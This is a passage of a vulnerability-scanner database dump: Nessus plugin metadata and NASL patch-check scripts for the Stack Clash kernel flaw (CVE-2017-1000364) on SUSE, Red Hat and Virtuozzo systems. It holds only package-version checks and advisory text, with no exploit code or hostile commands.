reference:\"kernel-default-4.4.59-92.24.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.59-92.24.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.59-92.24.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.59-92.24.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.59-92.24.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.59-92.24.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.59-92.24.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:31", "description": "The SUSE Linux Enterprise 11 SP3 kernel was updated to fix the following issues :\n\n - A previous security update to address CVE-2017-1000364 caused unintended side-effects in several other tools, most notably Java. These issues have been remedied.\n [bsc#1045340, bsc#1045406]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-28T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : kernel (SUSE-SU-2017:1706-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-bigsmp", "p-cpe:/a:novell:suse_linux:kernel-bigsmp-base", "p-cpe:/a:novell:suse_linux:kernel-bigsmp-devel", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-ec2", "p-cpe:/a:novell:suse_linux:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:kernel-ec2-devel", "p-cpe:/a:novell:suse_linux:kernel-pae", "p-cpe:/a:novell:suse_linux:kernel-pae-base", "p-cpe:/a:novell:suse_linux:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:kernel-source", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-trace", "p-cpe:/a:novell:suse_linux:kernel-trace-base", "p-cpe:/a:novell:suse_linux:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2017-1706-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101082", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1706-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101082);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES11 Security Update : kernel (SUSE-SU-2017:1706-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 SP3 kernel was updated to fix the\nfollowing issues :\n\n - A previous security update to address CVE-2017-1000364\n caused unintended side-effects in several other tools,\n most notably Java. These issues have been remedied.\n [bsc#1045340, bsc#1045406]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045406\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171706-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?16f304d1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-kernel-13178=1\n\nSUSE Linux Enterprise Server 11-EXTRA:zypper in -t patch\nslexsp3-kernel-13178=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-kernel-13178=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-kernel-13178=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-ec2-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-base-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-devel-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-default-man-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-base-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-devel-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-source-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-syms-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-trace-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-trace-base-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-trace-devel-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-ec2-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-ec2-base-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-ec2-devel-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-0.47.105.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-0.47.105.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:53", "description": "An update for kernel is now available for Red Hat Enterprise Linux 5.9 Long Life.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way memory was being allocated on the stack for user space binaries. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is a kernel-side mitigation which increases the stack guard gap size from one page to 1 MiB to make successful exploitation of this issue more difficult.\n(CVE-2017-1000364, Important)\n\nRed Hat would like to thank Qualys Research Labs for reporting this issue.", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "nessus", "title": "RHEL 5 : kernel (RHSA-2017:1483) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-pae", "p-cpe:/a:redhat:enterprise_linux:kernel-pae-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-pae-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-xen", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel", "cpe:/o:redhat:enterprise_linux:5.9"], "id": "REDHAT-RHSA-2017-1483.NASL", "href": "https://www.tenable.com/plugins/nessus/100893", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1483. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100893);\n script_version(\"3.16\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2017-1000364\");\n script_xref(name:\"RHSA\", value:\"2017:1483\");\n script_xref(name:\"IAVB\", value:\"2017-B-0075\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2017:1483) (Stack Clash)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 5.9\nLong Life.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way memory was being allocated on the stack\nfor user space binaries. If heap (or different memory region) and\nstack memory regions were adjacent to each other, an attacker could\nuse this flaw to jump over the stack guard gap, cause controlled\nmemory corruption on process stack or the adjacent memory region, and\nthus increase their privileges on the system. This is a kernel-side\nmitigation which increases the stack guard gap size from one page to 1\nMiB to make successful exploitation of this issue more difficult.\n(CVE-2017-1000364, Important)\n\nRed Hat would like to thank Qualys Research Labs for reporting this\nissue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2017-1000364.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/stackguard\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2017-1483.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/20\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5\\.9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.9\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1483\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-PAE-debuginfo-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-debuginfo-common-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"kernel-doc-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-348.33.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-348.33.2.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-debuginfo / kernel-PAE-devel / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:56", "description": "According to the version of the crit / criu / criu-devel / python-criu / vzkernel / etc packages installed, the Virtuozzo installation on the remote host is affected by the following vulnerability :\n\n - A flaw was found in the way memory was being allocated on the stack for user space binaries. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is a kernel-side mitigation which increases the stack guard gap size from one page to 1 MiB to make successful exploitation of this issue more difficult.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-27T00:00:00", "type": "nessus", "title": "Virtuozzo 7 : crit / criu / criu-devel / python-criu / vzkernel / etc (VZA-2017-056)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-04T00:00:00", "cpe": 